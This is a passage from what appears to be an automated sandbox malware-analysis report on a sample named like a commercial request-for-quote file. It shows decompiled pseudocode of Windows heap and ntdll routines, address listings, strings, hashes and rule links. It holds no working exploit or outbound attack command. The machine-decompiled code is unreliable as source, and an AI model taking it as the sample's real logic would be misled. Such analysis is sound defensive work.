									if(_t195 >= 0x3f) {
										 *((intOrPtr*)(_t288 - 4)) = _t195;
										 *((char*)(_t333 + 7)) = 0x3f;
									} else {
										 *((char*)(_t333 + 7)) = _t195;
									}
									_t318 =  *((intOrPtr*)(_t333 + 6));
									_t211 =  *(_t260 + 0x40) & 0x00000040;
									_v28 = _t211;
									__eflags = _t318;
									if(_t318 == 0) {
										_t319 = _t260;
									} else {
										_t211 = _v28;
										_t319 = (_t333 & 0xffff0000) - ((_t318 & 0x000000ff) << 0x10) + 0x10000;
										__eflags = (_t333 & 0xffff0000) - ((_t318 & 0x000000ff) << 0x10) + 0x10000;
									}
									_t211 = _t211 != 0;
									L3335170C(_t260, _t319, _t288, _v20, (_t211 & 0xffffff00 | _t211 != 0x00000000) & 0x000000ff, _v12, _v16);
								}
								__eflags = _v24 & 0x00000008;
								_t315 = _a8;
								if((_v24 & 0x00000008) != 0) {
									__eflags = _t315 - _t330;
									if(_t315 < _t330) {
										_t330 = _t315;
									}
									L3334EACC(_t260, _t333 + 8, _t330);
									goto L40;
								} else {
									__eflags =  *(_t260 + 0x40) & 0x00000040;
									if(( *(_t260 + 0x40) & 0x00000040) != 0) {
										_t287 = _t330 & 0x00000003;
										__eflags = _t287;
										if(_t287 != 0) {
											_t208 = 4;
											_t209 = _t208 - _t287;
											__eflags = _t209;
											_t287 = _t209;
										}
										_t198 = _a8;
										_t317 = _t287 + _t330;
										__eflags = _t198 - _t317;
										if(_t198 <= _t317) {
											L41:
											__eflags =  *(_t260 + 0x40) & 0x00000020;
											if(( *(_t260 + 0x40) & 0x00000020) != 0) {
												 *((intOrPtr*)(_t333 + _t198 + 8)) = 0xabababab;
												 *((intOrPtr*)(_t333 + _t198 + 0xc)) = 0xabababab;
											}
											 *(_t333 + 2) = (_v24 >> 0x00000004 ^  *(_t333 + 2)) & 0x0000001f ^ _v24 >> 0x00000004;
											return 1;
										} else {
											_t204 = _t198 - _t287 - _t330 & 0xfffffffc;
											__eflags = _t204;
											if(_t204 != 0) {
												E333A8140(_t333 + 8 + _t317, _t204, 0xbaadf00d);
											}
											goto L40;
										}
									}
									L40:
									_t198 = _a8;
									goto L41;
								}
							}
						}
						_t233 = ( *_t327 & 0x0000ffff) * 8 - 0x10;
						_v16 = _t233;
						__eflags = _t267 & 0x00000002;
						if((_t267 & 0x00000002) != 0) {
							_t299 = 4;
							__eflags = _t233 - _t299;
							if(_t233 > _t299) {
								_v16 = _t233;
							}
						}
						_t50 =  &(_t327[8]); // 0x18
						_t235 = E333A80A0(_t50, _t233, 0xfeeefeee);
						_v20 = _t235;
						__eflags = _t235 - _v16;
						if(_t235 == _v16) {
							L23:
							_t311 = 0;
							__eflags = 0;
							goto L24;
						} else {
							_t236 =  *[fs:0x30];
							__eflags =  *(_t236 + 0xc);
							if( *(_t236 + 0xc) != 0) {
								__eflags =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c;
								E3334B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							} else {
								_push("HEAP: ");
								E3334B910();
							}
							_push(_v20 + 0x10 + _t327);
							E3334B910("HEAP: Free Heap block %p modified at %p after it was freed\n", _t327);
							_t246 =  *[fs:0x30];
							__eflags =  *((char*)(_t246 + 2));
							if( *((char*)(_t246 + 2)) == 0) {
								goto L23;
							} else {
								 *0x334447a1 = 1;
								asm("int3");
								_t311 = 0;
								 *0x334447a1 = 0;
								goto L24;
							}
						}
					} else {
						_t303 =  *_t327 & 0x0000ffff;
						while(1) {
							__eflags = _t303 -  *((intOrPtr*)(_t309 + 4));
							if(_t303 <  *((intOrPtr*)(_t309 + 4))) {
								_t250 = _t303;
								break;
							}
							_t253 =  *_t309;
							__eflags = _t253;
							if(_t253 == 0) {
								_t250 =  *((intOrPtr*)(_t309 + 4)) - 1;
								break;
							} else {
								_t309 = _t253;
								continue;
							}
						}
						_t35 =  &(_t327[4]); // 0x10
						E3336036A(_t260, _t309, "true", _t35, _t250, _t303);
						goto L17;
					}
				}
				L6:
				_push(0);
				_push( *_v16);
				_push(_t182);
				_push(_t307);
				_t264 = 0xd;
				E33415FED(_t264, _t260);
				goto L7;
			}





































































                                                                                                                                                                                  0x33351388
                                                                                                                                                                                  0x3335138c
                                                                                                                                                                                  0x3335138e
                                                                                                                                                                                  0x33351392
                                                                                                                                                                                  0x33351396
                                                                                                                                                                                  0x3335139c
                                                                                                                                                                                  0x33351413
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33351413
                                                                                                                                                                                  0x333513a1
                                                                                                                                                                                  0x333513a7
                                                                                                                                                                                  0x333513b8
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333513be
                                                                                                                                                                                  0x333513c3
                                                                                                                                                                                  0x333513d0
                                                                                                                                                                                  0x333af4c9
                                                                                                                                                                                  0x333af4cc
                                                                                                                                                                                  0x333af4cc
                                                                                                                                                                                  0x333513d0
                                                                                                                                                                                  0x333513d6
                                                                                                                                                                                  0x333513dc
                                                                                                                                                                                  0x333513de
                                                                                                                                                                                  0x333513e4
                                                                                                                                                                                  0x33351603
                                                                                                                                                                                  0x33351607
                                                                                                                                                                                  0x33351615
                                                                                                                                                                                  0x3335161b
                                                                                                                                                                                  0x3335161b
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33351607
                                                                                                                                                                                  0x333513ea
                                                                                                                                                                                  0x333513ed
                                                                                                                                                                                  0x333513f0
                                                                                                                                                                                  0x333513f3
                                                                                                                                                                                  0x333513f6
                                                                                                                                                                                  0x333513fb
                                                                                                                                                                                  0x333513fb
                                                                                                                                                                                  0x333513fe
                                                                                                                                                                                  0x3335141f
                                                                                                                                                                                  0x33351421
                                                                                                                                                                                  0x33351424
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33351426
                                                                                                                                                                                  0x33351429
                                                                                                                                                                                  0x3335142f
                                                                                                                                                                                  0x33351431
                                                                                                                                                                                  0x3335145a
                                                                                                                                                                                  0x3335145a
                                                                                                                                                                                  0x3335145d
                                                                                                                                                                                  0x33351460
                                                                                                                                                                                  0x33351462
                                                                                                                                                                                  0x33351465
                                                                                                                                                                                  0x33351469
                                                                                                                                                                                  0x3335167e
                                                                                                                                                                                  0x33351683
                                                                                                                                                                                  0x33351685
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333af4e0
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333af4e0
                                                                                                                                                                                  0x3335146f
                                                                                                                                                                                  0x3335146f
                                                                                                                                                                                  0x33351472
                                                                                                                                                                                  0x33351474
                                                                                                                                                                                  0x33351477
                                                                                                                                                                                  0x333514c7
                                                                                                                                                                                  0x333514cd
                                                                                                                                                                                  0x333514d0
                                                                                                                                                                                  0x333514d3
                                                                                                                                                                                  0x333514d6
                                                                                                                                                                                  0x333514d9
                                                                                                                                                                                  0x333af4f2
                                                                                                                                                                                  0x333514df
                                                                                                                                                                                  0x333514df
                                                                                                                                                                                  0x333514e2
                                                                                                                                                                                  0x333af4ff
                                                                                                                                                                                  0x333514e8
                                                                                                                                                                                  0x333514ec
                                                                                                                                                                                  0x333514ee
                                                                                                                                                                                  0x333af509
                                                                                                                                                                                  0x333af50b
                                                                                                                                                                                  0x333af530
                                                                                                                                                                                  0x333af533
                                                                                                                                                                                  0x333af544
                                                                                                                                                                                  0x333af535
                                                                                                                                                                                  0x333af535
                                                                                                                                                                                  0x333af537
                                                                                                                                                                                  0x333af53a
                                                                                                                                                                                  0x333af53c
                                                                                                                                                                                  0x333af53c
                                                                                                                                                                                  0x333af53c
                                                                                                                                                                                  0x333af53f
                                                                                                                                                                                  0x333af53f
                                                                                                                                                                                  0x333af50d
                                                                                                                                                                                  0x333af51a
                                                                                                                                                                                  0x333af51c
                                                                                                                                                                                  0x333af51f
                                                                                                                                                                                  0x333af526
                                                                                                                                                                                  0x333af526
                                                                                                                                                                                  0x333af528
                                                                                                                                                                                  0x333af528
                                                                                                                                                                                  0x333af52a
                                                                                                                                                                                  0x333af52a
                                                                                                                                                                                  0x333af54d
                                                                                                                                                                                  0x333514f4
                                                                                                                                                                                  0x333514f7
                                                                                                                                                                                  0x333514f7
                                                                                                                                                                                  0x333514f7
                                                                                                                                                                                  0x333514ee
                                                                                                                                                                                  0x333514e2
                                                                                                                                                                                  0x333514fa
                                                                                                                                                                                  0x333514fd
                                                                                                                                                                                  0x333514ff
                                                                                                                                                                                  0x33351504
                                                                                                                                                                                  0x33351506
                                                                                                                                                                                  0x33351509
                                                                                                                                                                                  0x333516a4
                                                                                                                                                                                  0x333516a6
                                                                                                                                                                                  0x333516a6
                                                                                                                                                                                  0x33351511
                                                                                                                                                                                  0x33351512
                                                                                                                                                                                  0x33351514
                                                                                                                                                                                  0x33351518
                                                                                                                                                                                  0x3335151c
                                                                                                                                                                                  0x3335151f
                                                                                                                                                                                  0x333516dd
                                                                                                                                                                                  0x333516e4
                                                                                                                                                                                  0x333516ec
                                                                                                                                                                                  0x333516f0
                                                                                                                                                                                  0x333516f6
                                                                                                                                                                                  0x333516fd
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333af564
                                                                                                                                                                                  0x333af569
                                                                                                                                                                                  0x333af56c
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33351525
                                                                                                                                                                                  0x33351525
                                                                                                                                                                                  0x3335152b
                                                                                                                                                                                  0x33351532
                                                                                                                                                                                  0x333af588
                                                                                                                                                                                  0x333af588
                                                                                                                                                                                  0x33351538
                                                                                                                                                                                  0x33351538
                                                                                                                                                                                  0x3335153b
                                                                                                                                                                                  0x3335153b
                                                                                                                                                                                  0x33351540
                                                                                                                                                                                  0x33351543
                                                                                                                                                                                  0x33351546
                                                                                                                                                                                  0x3335154b
                                                                                                                                                                                  0x3335154e
                                                                                                                                                                                  0x33351552
                                                                                                                                                                                  0x333516b1
                                                                                                                                                                                  0x333516b4
                                                                                                                                                                                  0x333516b7
                                                                                                                                                                                  0x333af590
                                                                                                                                                                                  0x333af594
                                                                                                                                                                                  0x333516bd
                                                                                                                                                                                  0x333516bd
                                                                                                                                                                                  0x333516bd
                                                                                                                                                                                  0x333516ca
                                                                                                                                                                                  0x33351558
                                                                                                                                                                                  0x33351558
                                                                                                                                                                                  0x3335155a
                                                                                                                                                                                  0x3335155d
                                                                                                                                                                                  0x333af59d
                                                                                                                                                                                  0x333af5a0
                                                                                                                                                                                  0x33351563
                                                                                                                                                                                  0x33351563
                                                                                                                                                                                  0x33351563
                                                                                                                                                                                  0x33351569
                                                                                                                                                                                  0x3335156c
                                                                                                                                                                                  0x3335156f
                                                                                                                                                                                  0x33351572
                                                                                                                                                                                  0x33351574
                                                                                                                                                                                  0x333515ea
                                                                                                                                                                                  0x33351576
                                                                                                                                                                                  0x33351586
                                                                                                                                                                                  0x33351589
                                                                                                                                                                                  0x33351589
                                                                                                                                                                                  0x33351589
                                                                                                                                                                                  0x33351597
                                                                                                                                                                                  0x333515a4
                                                                                                                                                                                  0x333515a4
                                                                                                                                                                                  0x333515a9
                                                                                                                                                                                  0x333515ad
                                                                                                                                                                                  0x333515b0
                                                                                                                                                                                  0x33351690
                                                                                                                                                                                  0x33351692
                                                                                                                                                                                  0x33351708
                                                                                                                                                                                  0x33351708
                                                                                                                                                                                  0x3335169a
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333515b6
                                                                                                                                                                                  0x333515b6
                                                                                                                                                                                  0x333515ba
                                                                                                                                                                                  0x333af5ab
                                                                                                                                                                                  0x333af5ab
                                                                                                                                                                                  0x333af5ae
                                                                                                                                                                                  0x333af5b2
                                                                                                                                                                                  0x333af5b3
                                                                                                                                                                                  0x333af5b3
                                                                                                                                                                                  0x333af5b5
                                                                                                                                                                                  0x333af5b5
                                                                                                                                                                                  0x333af5b7
                                                                                                                                                                                  0x333af5ba
                                                                                                                                                                                  0x333af5bd
                                                                                                                                                                                  0x333af5bf
                                                                                                                                                                                  0x333515c3
                                                                                                                                                                                  0x333515c3
                                                                                                                                                                                  0x333515c7
                                                                                                                                                                                  0x333af5ed
                                                                                                                                                                                  0x333af5f1
                                                                                                                                                                                  0x333af5f1
                                                                                                                                                                                  0x333515e2
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333af5c5
                                                                                                                                                                                  0x333af5c9
                                                                                                                                                                                  0x333af5c9
                                                                                                                                                                                  0x333af5cc
                                                                                                                                                                                  0x333af5de
                                                                                                                                                                                  0x333af5de
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333af5cc
                                                                                                                                                                                  0x333af5bf
                                                                                                                                                                                  0x333515c0
                                                                                                                                                                                  0x333515c0
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333515c0
                                                                                                                                                                                  0x333515b0
                                                                                                                                                                                  0x3335151f
                                                                                                                                                                                  0x3335147c
                                                                                                                                                                                  0x33351483
                                                                                                                                                                                  0x33351486
                                                                                                                                                                                  0x33351489
                                                                                                                                                                                  0x333515f0
                                                                                                                                                                                  0x333515f1
                                                                                                                                                                                  0x333515f3
                                                                                                                                                                                  0x333515fb
                                                                                                                                                                                  0x333515fb
                                                                                                                                                                                  0x333515f3
                                                                                                                                                                                  0x33351495
                                                                                                                                                                                  0x33351499
                                                                                                                                                                                  0x3335149e
                                                                                                                                                                                  0x333514a1
                                                                                                                                                                                  0x333514a4
                                                                                                                                                                                  0x333514c5
                                                                                                                                                                                  0x333514c5
                                                                                                                                                                                  0x333514c5
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333514a6
                                                                                                                                                                                  0x333514a6
                                                                                                                                                                                  0x333514ac
                                                                                                                                                                                  0x333514b0
                                                                                                                                                                                  0x3335162e
                                                                                                                                                                                  0x33351637
                                                                                                                                                                                  0x333514b6
                                                                                                                                                                                  0x333514b6
                                                                                                                                                                                  0x333514bb
                                                                                                                                                                                  0x333514bb
                                                                                                                                                                                  0x33351646
                                                                                                                                                                                  0x3335164d
                                                                                                                                                                                  0x33351652
                                                                                                                                                                                  0x3335165b
                                                                                                                                                                                  0x3335165f
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33351665
                                                                                                                                                                                  0x33351665
                                                                                                                                                                                  0x3335166c
                                                                                                                                                                                  0x3335166d
                                                                                                                                                                                  0x3335166f
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335166f
                                                                                                                                                                                  0x3335165f
                                                                                                                                                                                  0x33351433
                                                                                                                                                                                  0x33351433
                                                                                                                                                                                  0x33351436
                                                                                                                                                                                  0x33351436
                                                                                                                                                                                  0x33351439
                                                                                                                                                                                  0x33351449
                                                                                                                                                                                  0x33351449
                                                                                                                                                                                  0x33351449
                                                                                                                                                                                  0x3335143b
                                                                                                                                                                                  0x3335143d
                                                                                                                                                                                  0x3335143f
                                                                                                                                                                                  0x333516d7
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33351445
                                                                                                                                                                                  0x33351445
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33351445
                                                                                                                                                                                  0x3335143f
                                                                                                                                                                                  0x3335144d
                                                                                                                                                                                  0x33351455
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33351455
                                                                                                                                                                                  0x33351431
                                                                                                                                                                                  0x33351400
                                                                                                                                                                                  0x33351403
                                                                                                                                                                                  0x33351405
                                                                                                                                                                                  0x33351407
                                                                                                                                                                                  0x33351408
                                                                                                                                                                                  0x3335140d
                                                                                                                                                                                  0x3335140e
                                                                                                                                                                                  0x00000000

                                                                                                                                                                                  Strings
                                                                                                                                                                                  • HEAP[%wZ]: , xrefs: 33351632
                                                                                                                                                                                  • HEAP: , xrefs: 333514B6
                                                                                                                                                                                  • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 33351648
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                                                                                  • API String ID: 0-3178619729
                                                                                                                                                                                  • Opcode ID: 6482d2746807124c0da484696d71594d0b119f49dff6ed0bdc054a62fd44c3a6
                                                                                                                                                                                  • Instruction ID: 86ee51f7343f6d05605214d9c26e5e3f8a8fafdc6e82ae19028ef74108bcf3c2
                                                                                                                                                                                  • Opcode Fuzzy Hash: 6482d2746807124c0da484696d71594d0b119f49dff6ed0bdc054a62fd44c3a6
                                                                                                                                                                                  • Instruction Fuzzy Hash: F9E1CF74E047459FEB14CF28C890A7ABBF9EF48305F18C969E8D68B245E734E985CB50
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 333D330C Relevance: 4.0, Strings: 3, Instructions: 292COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 53%
                                                                                                                                                                                  			E333D330C(signed int __ecx, intOrPtr __edx) {
				signed int _v8;
				char _v268;
				char _v396;
				char _v420;
				char _v1420;
				char _v1428;
				signed int _v1432;
				signed int _v1436;
				intOrPtr _v1440;
				signed int* _v1444;
				signed int _v1448;
				char _v1452;
				signed int _v1456;
				signed int _v1460;
				char _v1468;
				void* _v1472;
				signed int _v1476;
				char _v1480;
				signed int _v1484;
				signed int _v1488;
				short _v1490;
				signed int _v1492;
				char _v1496;
				char _v1500;
				char _v1516;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t89;
				signed int _t96;
				void* _t101;
				char* _t107;
				intOrPtr* _t108;
				intOrPtr* _t109;
				intOrPtr* _t110;
				intOrPtr* _t111;
				intOrPtr _t118;
				intOrPtr _t124;
				intOrPtr _t131;
				signed int _t135;
				void* _t136;
				signed int _t137;
				signed int _t138;
				signed int _t139;
				signed int _t143;
				signed int _t144;
				void* _t148;
				signed int _t149;
				intOrPtr _t150;
				intOrPtr* _t151;
				void* _t152;
				void* _t156;
				signed int _t158;
				signed int _t160;
				char _t162;
				signed int _t163;
				signed int _t164;
				signed int _t166;

				_t146 = __edx;
				_t140 = __ecx;
				_t166 = (_t164 & 0xfffffff8) - 0x5d4;
				_v8 =  *0x3344b370 ^ _t166;
				_t135 = __ecx;
				_v1476 = __ecx;
				if( *0x334469b4 == 0) {
					_t74 = 0xc0000034;
					__eflags = __ecx;
					if(__ecx == 0) {
						goto L54;
					}
					_t74 = E33371D10( &_v1468, L"DelegatedNtdll");
					__eflags = 0xc0000034;
					if(0xc0000034 < 0) {
						goto L54;
					}
					_push( &_v1496);
					_push(0x400);
					_t149 =  &_v1420;
					_push(_t149);
					_push(2);
					_push( &_v1468);
					_push(_t135);
					_t74 = E33392B00();
					_t158 = 0xc0000034;
					__eflags = 0xc0000034;
					if(0xc0000034 < 0) {
						__eflags = 0xc0000034 - 0x80000005;
						if(0xc0000034 != 0x80000005) {
							L28:
							__eflags = _t158;
							if(_t158 < 0) {
								goto L54;
							}
							_v1492 = _v1492 & 0x00000000;
							_v1490 = 0x100;
							_v1488 =  &_v268;
							E3335FE40(_t140,  &_v1492, L"\\SystemRoot\\system32\\");
							E33386140( &_v1500, "true", 0x14c, "true");
							_t74 = E3335FE40(_t140,  &_v1516,  &_v420);
							__eflags = _t74;
							if(_t74 < 0) {
								goto L54;
							}
							_v1448 = _v1448 & 0x00000000;
							_v1436 = _v1436 & 0x00000000;
							_v1432 = _v1432 & 0x00000000;
							_v1444 =  &_v1492;
							_t89 =  *[fs:0x30];
							_v1452 = 0x18;
							_v1440 = 0x40;
							__eflags =  *(_t89 + 0x68) & 0x00040000;
							if(( *(_t89 + 0x68) & 0x00040000) != 0) {
								_push(0);
								_push(0);
								_v1460 = _v1492;
								_push(0);
								_v1456 = _v1488;
								_push(8);
								_push( &_v1460);
								_push(0x26);
								E33394580();
							}
							_push(0x60);
							_push(5);
							_push( &_v1428);
							_push( &_v1452);
							_push(0x100021);
							_push( &_v1480);
							_t74 = L33392CE0();
							__eflags = _t74;
							if(_t74 < 0) {
								goto L54;
							} else {
								_push(_v1480);
								_v1484 = _v1484 & 0x00000000;
								_push(0x1000000);
								_push(0x10);
								_push(0);
								_push(0);
								_push(0xd);
								_push( &_v1484);
								_t137 = E33392E50();
								__eflags = _t137;
								if(_t137 < 0) {
									L47:
									_push(_v1480);
									E33392A80();
									__eflags = _v1488;
									if(_v1488 != 0) {
										_push(_v1484);
										E33392A80();
									}
									__eflags = _t137;
									if(_t137 < 0) {
										_t96 =  *0x334468d0; // 0x0
										__eflags = _t96;
										if(_t96 != 0) {
											_push(_t96);
											_push(0xffffffff);
											E33392C50();
											 *0x334468d0 =  *0x334468d0 & 0x00000000;
											__eflags =  *0x334468d0;
										}
									}
									_t74 = _t137;
									goto L54;
								}
								_t150 =  *[fs:0x18];
								_t138 = 0;
								_push(2);
								_push(0);
								_t159 =  *(_t150 + 0x14);
								_push("true");
								 *(_t150 + 0x14) = _v1488;
								_push( &_v1472);
								_push(0);
								_push(0);
								_push(0);
								_push(0x334468d0);
								_push(0xffffffff);
								_push(_v1484);
								_v1472 = 0;
								_t101 = E33392C30();
								__eflags = _t101 - 0x40000003;
								if(__eflags == 0) {
									_t140 =  *0x334468d0; // 0x0
									_t166 = _t166 - 0xc;
									E333D11C1(0, _t140, _t150, _t159, __eflags);
								}
								__eflags = E3335B920(_t140,  *0x334468d0);
								if(__eflags != 0) {
									_t160 = _t138;
									_t151 = 0x333219c0;
									while(1) {
										_t65 = _t151 + 4; // 0x0
										_t146 =  *_t151;
										_t143 =  *0x334468d0; // 0x0
										_t137 = E333462A0(_t143,  *_t151, __eflags, _t138,  *_t65);
										__eflags = _t137;
										if(_t137 < 0) {
											break;
										}
										_t160 = _t160 + 1;
										_t151 = _t151 + 8;
										__eflags = _t160 - 0xd;
										if(_t160 < 0xd) {
											_t138 = 0;
											__eflags = 0;
											continue;
										}
										_t152 =  *0x334469d0; // 0x0
										__eflags =  *_t152 -  *0x33449248; // 0xf0
										if(__eflags == 0) {
											_t144 = 0x3c;
											memcpy(_t152, 0x33449248, _t144 << 2);
											_t166 = _t166 + 0xc;
											_t107 =  *0x334469c0; // 0x0
											 *_t107 = 1;
											_t108 =  *0x33446994; // 0x0
											 *_t108 = E33362130;
											_t109 =  *0x334469a4; // 0x0
											 *_t109 = E33394880;
											_t110 =  *0x334469c8; // 0x0
											 *_t110 = 0x333949a0;
											_t111 =  *0x334469b8; // 0x0
											 *_t111 = E33394A50;
										} else {
											_t137 = 0xc0000059;
										}
										goto L47;
									}
									__eflags = _t160;
									if(_t160 == 0) {
										goto L47;
									} else {
										goto L46;
									}
									do {
										L46:
										_t67 = _t151 + 4; // 0x334468e0
										 *( *_t67) =  *( *_t67) & 0x00000000;
										_t160 = _t160 - 1;
										__eflags = _t160;
									} while (_t160 != 0);
								} else {
									_t137 = 0xc000007b;
								}
								goto L47;
							}
						} else {
							goto L13;
						}
						while(1) {
							L13:
							_t162 = _v1496;
							_t140 =  *( *[fs:0x30] + 0x18);
							__eflags = _t140;
							if(_t140 == 0) {
								break;
							}
							_t118 =  *0x33445d78; // 0x0
							_t139 = L33365D90(_t140, _t140, _t118 + 0x180000, _v1496);
							__eflags = _t139;
							if(_t139 == 0) {
								break;
							}
							_t149 = _t139;
							_push( &_v1496);
							_push(_t162);
							_push(_t139);
							_push(2);
							_push( &_v1468);
							_push(_v1476);
							_t163 = E33392B00();
							__eflags = _t163;
							if(_t163 >= 0) {
								L6:
								_t124 =  *((intOrPtr*)(_t149 + 4));
								__eflags = _t124 - 3;
								if(_t124 == 3) {
									L21:
									__eflags = _t124 - 1;
									if(_t124 != 1) {
										L11:
										_t158 = 0xc0000024;
										L25:
										__eflags = _t139;
										if(_t139 != 0) {
											E33363BC0( *( *[fs:0x30] + 0x18), 0, _t139);
										}
										_t74 = _t158;
										goto L28;
									}
									_v1496 =  *((intOrPtr*)(_t149 + 8));
									__eflags =  *((intOrPtr*)(_t149 + 8)) - 0x80;
									if( *((intOrPtr*)(_t149 + 8)) > 0x80) {
										L24:
										_t158 = 0x80000005;
										goto L25;
									}
									_push( *((intOrPtr*)(_t149 + 8)));
									L20:
									_t17 = _t149 + 0xc; // 0xc
									_push( &_v396);
									E333988C0();
									_t166 = _t166 + 0xc;
									goto L25;
								}
								__eflags = _t124 - 7;
								if(_t124 == 7) {
									goto L21;
								}
								__eflags = _t124 - 4;
								if(_t124 == 4) {
									goto L11;
								}
								__eflags = _t124 - 0xb;
								if(_t124 == 0xb) {
									goto L11;
								}
								__eflags = _t124 - 1;
								if(_t124 == 1) {
									_t131 =  *((intOrPtr*)(_t149 + 8));
									_v1496 = _t131;
									__eflags = _t131 - 0x80;
									if(_t131 > 0x80) {
										goto L24;
									}
									_push(_t131);
									goto L20;
								}
								goto L11;
							}
							__eflags = _t163 - 0x80000005;
							if(_t163 != 0x80000005) {
								goto L25;
							}
							E33363BC0( *( *[fs:0x30] + 0x18), 0, _t139);
						}
						_t74 = 0xc0000017;
						goto L54;
					}
					_t139 = 0;
					__eflags = 0;
					goto L6;
				} else {
					_t74 = 0;
					L54:
					_pop(_t148);
					_pop(_t156);
					_pop(_t136);
					return E33394B50(_t74, _t136, _v8 ^ _t166, _t146, _t148, _t156);
				}
			}






























































                                                                                                                                                                                  0x333d330c
                                                                                                                                                                                  0x333d330c
                                                                                                                                                                                  0x333d3314
                                                                                                                                                                                  0x333d3321
                                                                                                                                                                                  0x333d3331
                                                                                                                                                                                  0x333d3334
                                                                                                                                                                                  0x333d3338
                                                                                                                                                                                  0x333d3341
                                                                                                                                                                                  0x333d3346
                                                                                                                                                                                  0x333d3348
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333d3358
                                                                                                                                                                                  0x333d335f
                                                                                                                                                                                  0x333d3361
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333d336b
                                                                                                                                                                                  0x333d336c
                                                                                                                                                                                  0x333d3371
                                                                                                                                                                                  0x333d3377
                                                                                                                                                                                  0x333d3378
                                                                                                                                                                                  0x333d337e
                                                                                                                                                                                  0x333d337f
                                                                                                                                                                                  0x333d3380
                                                                                                                                                                                  0x333d3385
                                                                                                                                                                                  0x333d3387
                                                                                                                                                                                  0x333d3389
                                                                                                                                                                                  0x333d33bf
                                                                                                                                                                                  0x333d33c5
                                                                                                                                                                                  0x333d349c
                                                                                                                                                                                  0x333d349c
                                                                                                                                                                                  0x333d349e
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333d34a4
                                                                                                                                                                                  0x333d34ae
                                                                                                                                                                                  0x333d34ba
                                                                                                                                                                                  0x333d34c8
                                                                                                                                                                                  0x333d34db
                                                                                                                                                                                  0x333d34ed
                                                                                                                                                                                  0x333d34f2
                                                                                                                                                                                  0x333d34f4
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333d34fa
                                                                                                                                                                                  0x333d3503
                                                                                                                                                                                  0x333d3508
                                                                                                                                                                                  0x333d350d
                                                                                                                                                                                  0x333d3511
                                                                                                                                                                                  0x333d3517
                                                                                                                                                                                  0x333d351f
                                                                                                                                                                                  0x333d3527
                                                                                                                                                                                  0x333d352e
                                                                                                                                                                                  0x333d3534
                                                                                                                                                                                  0x333d3536
                                                                                                                                                                                  0x333d3538
                                                                                                                                                                                  0x333d3540
                                                                                                                                                                                  0x333d3542
                                                                                                                                                                                  0x333d354a
                                                                                                                                                                                  0x333d354c
                                                                                                                                                                                  0x333d354d
                                                                                                                                                                                  0x333d354f
                                                                                                                                                                                  0x333d354f
                                                                                                                                                                                  0x333d3554
                                                                                                                                                                                  0x333d3556
                                                                                                                                                                                  0x333d355c
                                                                                                                                                                                  0x333d3561
                                                                                                                                                                                  0x333d3562
                                                                                                                                                                                  0x333d356b
                                                                                                                                                                                  0x333d356c
                                                                                                                                                                                  0x333d3571
                                                                                                                                                                                  0x333d3573
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333d3579
                                                                                                                                                                                  0x333d3579
                                                                                                                                                                                  0x333d357d
                                                                                                                                                                                  0x333d3586
                                                                                                                                                                                  0x333d358b
                                                                                                                                                                                  0x333d358d
                                                                                                                                                                                  0x333d358f
                                                                                                                                                                                  0x333d3591
                                                                                                                                                                                  0x333d3593
                                                                                                                                                                                  0x333d3599
                                                                                                                                                                                  0x333d359b
                                                                                                                                                                                  0x333d359d
                                                                                                                                                                                  0x333d3699
                                                                                                                                                                                  0x333d3699
                                                                                                                                                                                  0x333d369d
                                                                                                                                                                                  0x333d36a2
                                                                                                                                                                                  0x333d36a7
                                                                                                                                                                                  0x333d36a9
                                                                                                                                                                                  0x333d36ad
                                                                                                                                                                                  0x333d36ad
                                                                                                                                                                                  0x333d36b2
                                                                                                                                                                                  0x333d36b4
                                                                                                                                                                                  0x333d36b6
